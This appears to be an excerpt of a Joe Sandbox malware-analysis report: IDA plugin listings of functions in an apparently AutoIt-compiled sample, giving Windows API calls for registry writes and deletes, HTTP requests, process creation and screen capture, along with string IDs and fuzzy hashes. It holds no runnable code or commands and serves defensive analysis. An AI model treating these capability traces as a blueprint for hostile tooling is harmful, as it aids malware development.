            • Opcode ID: c7f87c9166b4d544f7f7c227cd69e96123301a91d969047fe0a0722d944b1de8
            • Instruction ID: 5cd715897cf4ecb3fabff831a32198fd6e176c953113f2d94646153047ff0d0b
            • Opcode Fuzzy Hash: c7f87c9166b4d544f7f7c227cd69e96123301a91d969047fe0a0722d944b1de8
            • Instruction Fuzzy Hash: CC717C7290020AABFB219FA8DD44FEEBBBCBF05341F044159FA99F6184D7359905DB60
            APIs
            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0102C4BD
            • RegCreateKeyExW.ADVAPI32(?,?,00000000,0103CC08,00000000,?,00000000,?,?), ref: 0102C544
            • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0102C5A4
            • _wcslen.LIBCMT ref: 0102C5F4
            • _wcslen.LIBCMT ref: 0102C66F
            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0102C6B2
            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0102C7C1
            • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0102C84D
            • RegCloseKey.ADVAPI32(?), ref: 0102C881
            • RegCloseKey.ADVAPI32(00000000), ref: 0102C88E
            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0102C960
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Value$Close$_wcslen$ConnectCreateRegistry
            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
            • API String ID: 9721498-966354055
            • Opcode ID: 052fbd0a4ceea895d62d82c6870b51fd69d721752d74ca31b3253652f7ea03d7
            • Instruction ID: 7d3ba98284dc6ea5a34bf48e419642b38080282bcfb521547a86ff3c0b73b4a2
            • Opcode Fuzzy Hash: 052fbd0a4ceea895d62d82c6870b51fd69d721752d74ca31b3253652f7ea03d7
            • Instruction Fuzzy Hash: 60126A756042119FE714EF14C981E2AB7E5FF89714F08889CF98A9B3A2DB35EC41DB81
            APIs
            • CharUpperBuffW.USER32(?,?), ref: 010309C6
            • _wcslen.LIBCMT ref: 01030A01
            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01030A54
            • _wcslen.LIBCMT ref: 01030A8A
            • _wcslen.LIBCMT ref: 01030B06
            • _wcslen.LIBCMT ref: 01030B81
              • Part of subcall function 00FBF9F2: _wcslen.LIBCMT ref: 00FBF9FD
              • Part of subcall function 01002BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 01002BFA
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _wcslen$MessageSend$BuffCharUpper
            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
            • API String ID: 1103490817-4258414348
            • Opcode ID: d4976addf33feba6fd0a3424fe60a601c8e71e95dc706f2795948928e5332956
            • Instruction ID: af4a51840b3e81a15de5b010c835915dd2eb77d7c956cebb918a7ee1d58e7ecd
            • Opcode Fuzzy Hash: d4976addf33feba6fd0a3424fe60a601c8e71e95dc706f2795948928e5332956
            • Instruction Fuzzy Hash: C5E189312097018FC714EF29C85096AB7E9BFC9214F04899DF8D69B3A6D735ED46CB81
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _wcslen$BuffCharUpper
            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
            • API String ID: 1256254125-909552448
            • Opcode ID: d39c48a2354b344e7533d546503cf036f1701d8f5eb228ca4b033e815f3a7c5c
            • Instruction ID: 54d47cf1d3e0ec4ac7e77b6b23379e81a8a8fd6789c587d0c9f14cf7ef0eb956
            • Opcode Fuzzy Hash: d39c48a2354b344e7533d546503cf036f1701d8f5eb228ca4b033e815f3a7c5c
            • Instruction Fuzzy Hash: BA710332A001368BEB21DE7CCE516BE33D5AF51698F250168FCD6A7286E639DD44D3A0
            APIs
            • _wcslen.LIBCMT ref: 0103835A
            • _wcslen.LIBCMT ref: 0103836E
            • _wcslen.LIBCMT ref: 01038391
            • _wcslen.LIBCMT ref: 010383B4
            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 010383F2
            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,01035BF2), ref: 0103844E
            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 01038487
            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 010384CA
            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 01038501
            • FreeLibrary.KERNEL32(?), ref: 0103850D
            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0103851D
            • DestroyIcon.USER32(?,?,?,?,?,01035BF2), ref: 0103852C
            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 01038549
            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 01038555
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
            • String ID: .dll$.exe$.icl
            • API String ID: 799131459-1154884017
            • Opcode ID: 801cd57b64129156552d0ca465916c3adcbb163d16ef53f6a8d54b3e97cb9a14
            • Instruction ID: 48d218286ae6257a04f171aed4a1779e2eb8970ff588496715b7363f6a1a6d77
            • Opcode Fuzzy Hash: 801cd57b64129156552d0ca465916c3adcbb163d16ef53f6a8d54b3e97cb9a14
            • Instruction Fuzzy Hash: 13610271900215BEEB24DF64CC41FBE77ACBF48710F10868AF995E61D1DB79A980D7A0
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
            • API String ID: 0-1645009161
            • Opcode ID: ed4a8696ca4737287491924efcd41025fee38604c94ff39706967868aa2909cd
            • Instruction ID: 9d65c74344b6792679b603eaed2751b47854c7ca07d629786189988ce350a4b2
            • Opcode Fuzzy Hash: ed4a8696ca4737287491924efcd41025fee38604c94ff39706967868aa2909cd
            • Instruction Fuzzy Hash: 03810BB1A04706BBDB10BF61DD42FAE3768AF56750F044029F904AB192EB78D901F7A1
            APIs
            • LoadIconW.USER32(00000063), ref: 01005A2E
            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 01005A40
            • SetWindowTextW.USER32(?,?), ref: 01005A57
            • GetDlgItem.USER32(?,000003EA), ref: 01005A6C
            • SetWindowTextW.USER32(00000000,?), ref: 01005A72
            • GetDlgItem.USER32(?,000003E9), ref: 01005A82
            • SetWindowTextW.USER32(00000000,?), ref: 01005A88
            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 01005AA9
            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 01005AC3
            • GetWindowRect.USER32(?,?), ref: 01005ACC
            • _wcslen.LIBCMT ref: 01005B33
            • SetWindowTextW.USER32(?,?), ref: 01005B6F
            • GetDesktopWindow.USER32 ref: 01005B75
            • GetWindowRect.USER32(00000000), ref: 01005B7C
            • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 01005BD3
            • GetClientRect.USER32(?,?), ref: 01005BE0
            • PostMessageW.USER32(?,00000005,00000000,?), ref: 01005C05
            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 01005C2F
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
            • String ID:
            • API String ID: 895679908-0
            • Opcode ID: 0eb90ab9d6642f723b065da0344810fd56cf2f01e2e9bcc222d891c25fb4954d
            • Instruction ID: 4d7080b0f03416a0a273bd71a249322167ad89931bf0f1b16f7bcc57ea9faea2
            • Opcode Fuzzy Hash: 0eb90ab9d6642f723b065da0344810fd56cf2f01e2e9bcc222d891c25fb4954d
            • Instruction Fuzzy Hash: 17714931900B09AFEB21DFA8CE85AAEBBF9FF48704F104959E582A2590D775B944CF50
            APIs
            • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00FC00C6
              • Part of subcall function 00FC00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0107070C,00000FA0,AAA82A0A,?,?,?,?,00FE23B3,000000FF), ref: 00FC011C
              • Part of subcall function 00FC00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00FE23B3,000000FF), ref: 00FC0127
              • Part of subcall function 00FC00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00FE23B3,000000FF), ref: 00FC0138
              • Part of subcall function 00FC00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00FC014E
              • Part of subcall function 00FC00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00FC015C
              • Part of subcall function 00FC00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00FC016A
              • Part of subcall function 00FC00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00FC0195
              • Part of subcall function 00FC00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00FC01A0
            • ___scrt_fastfail.LIBCMT ref: 00FC00E7
              • Part of subcall function 00FC00A3: __onexit.LIBCMT ref: 00FC00A9
            Strings
            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00FC0122
            • kernel32.dll, xrefs: 00FC0133
            • SleepConditionVariableCS, xrefs: 00FC0154
            • InitializeConditionVariable, xrefs: 00FC0148
            • WakeAllConditionVariable, xrefs: 00FC0162
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
            • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
            • API String ID: 66158676-1714406822
            • Opcode ID: cb84606643803ce39c60148720bd92b5047af90626041975c6c788523ec59840
            • Instruction ID: dcb0cb476b77db08c8db53017d650c7c3291ff887a7bb79fec242454db802eaa
            • Opcode Fuzzy Hash: cb84606643803ce39c60148720bd92b5047af90626041975c6c788523ec59840
            • Instruction Fuzzy Hash: 9A21F232D45712ABE7216B65AE0BF69B39CEB45B61F04012EF881F6144DF798C009B51
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _wcslen
            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
            • API String ID: 176396367-1603158881
            • Opcode ID: 1481de3fc263af1a57624942ca13e53985ad6272837d5d2edc91f54ca2660bc3
            • Instruction ID: 9170645604ec0599218c1c267dfabe1c6489d13079a89f19e72304d20bbfb4b6
            • Opcode Fuzzy Hash: 1481de3fc263af1a57624942ca13e53985ad6272837d5d2edc91f54ca2660bc3
            • Instruction Fuzzy Hash: 6DE11532A005169FEB5B9F68C851BEEFBB4BF04750F148159E496FB281DF30A945CB90
            APIs
            • CharLowerBuffW.USER32(00000000,00000000,0103CC08), ref: 01014527
            • _wcslen.LIBCMT ref: 0101453B
            • _wcslen.LIBCMT ref: 01014599
            • _wcslen.LIBCMT ref: 010145F4
            • _wcslen.LIBCMT ref: 0101463F
            • _wcslen.LIBCMT ref: 010146A7
              • Part of subcall function 00FBF9F2: _wcslen.LIBCMT ref: 00FBF9FD
            • GetDriveTypeW.KERNEL32(?,01066BF0,00000061), ref: 01014743
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _wcslen$BuffCharDriveLowerType
            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
            • API String ID: 2055661098-1000479233
            APIs
            • _wcslen.LIBCMT ref: 0102B198
            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0102B1B0
            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0102B1D4
            • _wcslen.LIBCMT ref: 0102B200
            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0102B214
            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0102B236
            • _wcslen.LIBCMT ref: 0102B332
              • Part of subcall function 010105A7: GetStdHandle.KERNEL32(000000F6), ref: 010105C6
            • _wcslen.LIBCMT ref: 0102B34B
            • _wcslen.LIBCMT ref: 0102B366
            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0102B3B6
            • GetLastError.KERNEL32(00000000), ref: 0102B407
            • CloseHandle.KERNEL32(?), ref: 0102B439
            • CloseHandle.KERNEL32(00000000), ref: 0102B44A
            • CloseHandle.KERNEL32(00000000), ref: 0102B45C
            • CloseHandle.KERNEL32(00000000), ref: 0102B46E
            • CloseHandle.KERNEL32(?), ref: 0102B4E3
            Similarity
            • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
            • String ID:
            • API String ID: 2178637699-0
            APIs
            • GetMenuItemCount.USER32(01071990), ref: 00FE2F8D
            • GetMenuItemCount.USER32(01071990), ref: 00FE303D
            • GetCursorPos.USER32(?), ref: 00FE3081
            • SetForegroundWindow.USER32(00000000), ref: 00FE308A
            • TrackPopupMenuEx.USER32(01071990,00000000,?,00000000,00000000,00000000), ref: 00FE309D
            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00FE30A9
            Similarity
            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
            • String ID: 0
            • API String ID: 36266755-4108050209
            APIs
            • DestroyWindow.USER32(?,?), ref: 01036DEB
              • Part of subcall function 00FA6B57: _wcslen.LIBCMT ref: 00FA6B6A
            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 01036E5F
            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 01036E81
            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01036E94
            • DestroyWindow.USER32(?), ref: 01036EB5
            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00FA0000,00000000), ref: 01036EE4
            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01036EFD
            • GetDesktopWindow.USER32 ref: 01036F16
            • GetWindowRect.USER32(00000000), ref: 01036F1D
            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 01036F35
            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 01036F4D
              • Part of subcall function 00FB9944: GetWindowLongW.USER32(?,000000EB), ref: 00FB9952
            Similarity
            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
            • String ID: 0$tooltips_class32
            • API String ID: 2429346358-3619404913
            APIs
              • Part of subcall function 00FB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FB9BB2
            • DragQueryPoint.SHELL32(?,?), ref: 01039147
              • Part of subcall function 01037674: ClientToScreen.USER32(?,?), ref: 0103769A
              • Part of subcall function 01037674: GetWindowRect.USER32(?,?), ref: 01037710
              • Part of subcall function 01037674: PtInRect.USER32(?,?,01038B89), ref: 01037720
            • SendMessageW.USER32(?,000000B0,?,?), ref: 010391B0
            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 010391BB
            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 010391DE
            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 01039225
            • SendMessageW.USER32(?,000000B0,?,?), ref: 0103923E
            • SendMessageW.USER32(?,000000B1,?,?), ref: 01039255
            • SendMessageW.USER32(?,000000B1,?,?), ref: 01039277
            • DragFinish.SHELL32(?), ref: 0103927E
            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 01039371
            Similarity
            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
            • API String ID: 221274066-3440237614
            APIs
            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0101C4B0
            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0101C4C3
            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0101C4D7
            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0101C4F0
            • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0101C533
            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0101C549
            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0101C554
            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0101C584
            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0101C5DC
            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0101C5F0
            • InternetCloseHandle.WININET(00000000), ref: 0101C5FB
            Similarity
            • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
            • String ID:
            • API String ID: 3800310941-3916222277
            APIs
            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 01038592
            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 010385A2
            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 010385AD
            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 010385BA
            • GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 010385C8
            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 010385D7
            • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 010385E0
            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 010385E7
            • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 010385F8
            • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0103FC38,?), ref: 01038611
            • GlobalFree.KERNEL32(00000000), ref: 01038621
            • GetObjectW.GDI32(?,00000018,?), ref: 01038641
            • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 01038671
            • DeleteObject.GDI32(?), ref: 01038699
            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 010386AF
            Similarity
            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
            • String ID:
            • API String ID: 3840717409-0
            APIs
            • VariantInit.OLEAUT32(00000000), ref: 01011502
            • VariantCopy.OLEAUT32(?,?), ref: 0101150B
            • VariantClear.OLEAUT32(?), ref: 01011517
            • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 010115FB
            • VarR8FromDec.OLEAUT32(?,?), ref: 01011657
            • VariantInit.OLEAUT32(?), ref: 01011708
            • SysFreeString.OLEAUT32(?), ref: 0101178C
            • VariantClear.OLEAUT32(?), ref: 010117D8
            • VariantClear.OLEAUT32(?), ref: 010117E7
            • VariantInit.OLEAUT32(00000000), ref: 01011823
            Similarity
            • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
            • String ID: %4d%02d%02d%02d%02d%02d$Default
            • API String ID: 1234038744-3931177956
            APIs
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
              • Part of subcall function 0102C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0102B6AE,?,?), ref: 0102C9B5
              • Part of subcall function 0102C998: _wcslen.LIBCMT ref: 0102C9F1
              • Part of subcall function 0102C998: _wcslen.LIBCMT ref: 0102CA68
              • Part of subcall function 0102C998: _wcslen.LIBCMT ref: 0102CA9E
            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0102B6F4
            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0102B772
            • RegDeleteValueW.ADVAPI32(?,?), ref: 0102B80A
            • RegCloseKey.ADVAPI32(?), ref: 0102B87E
            • RegCloseKey.ADVAPI32(?), ref: 0102B89C
            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0102B8F2
            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0102B904
            • RegDeleteKeyW.ADVAPI32(?,?), ref: 0102B922
            • FreeLibrary.KERNEL32(00000000), ref: 0102B983
            • RegCloseKey.ADVAPI32(00000000), ref: 0102B994
            Similarity
            • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
            • String ID: RegDeleteKeyExW$advapi32.dll
            • API String ID: 146587525-4033151799
            APIs
            • GetDC.USER32(00000000), ref: 010225D8
            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 010225E8
            • CreateCompatibleDC.GDI32(?), ref: 010225F4
            • SelectObject.GDI32(00000000,?), ref: 01022601
            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0102266D
            • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 010226AC
            • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 010226D0
            • SelectObject.GDI32(?,?), ref: 010226D8
            • DeleteObject.GDI32(?), ref: 010226E1
            • DeleteDC.GDI32(?), ref: 010226E8
            • ReleaseDC.USER32(00000000,?), ref: 010226F3
            Similarity
            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
            • String ID: (
            • API String ID: 2598888154-3887548279
            APIs
            • ___free_lconv_mon.LIBCMT ref: 00FDDAA1
              • Part of subcall function 00FDD63C: _free.LIBCMT ref: 00FDD659
              • Part of subcall function 00FDD63C: _free.LIBCMT ref: 00FDD66B
              • Part of subcall function 00FDD63C: _free.LIBCMT ref: 00FDD67D
              • Part of subcall function 00FDD63C: _free.LIBCMT ref: 00FDD68F
              • Part of subcall function 00FDD63C: _free.LIBCMT ref: 00FDD6A1
              • Part of subcall function 00FDD63C: _free.LIBCMT ref: 00FDD6B3
              • Part of subcall function 00FDD63C: _free.LIBCMT ref: 00FDD6C5
              • Part of subcall function 00FDD63C: _free.LIBCMT ref: 00FDD6D7
              • Part of subcall function 00FDD63C: _free.LIBCMT ref: 00FDD6E9
              • Part of subcall function 00FDD63C: _free.LIBCMT ref: 00FDD6FB
              • Part of subcall function 00FDD63C: _free.LIBCMT ref: 00FDD70D
              • Part of subcall function 00FDD63C: _free.LIBCMT ref: 00FDD71F
              • Part of subcall function 00FDD63C: _free.LIBCMT ref: 00FDD731
            • _free.LIBCMT ref: 00FDDA96
              • Part of subcall function 00FD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00FDD7D1,00000000,00000000,00000000,00000000,?,00FDD7F8,00000000,00000007,00000000,?,00FDDBF5,00000000), ref: 00FD29DE
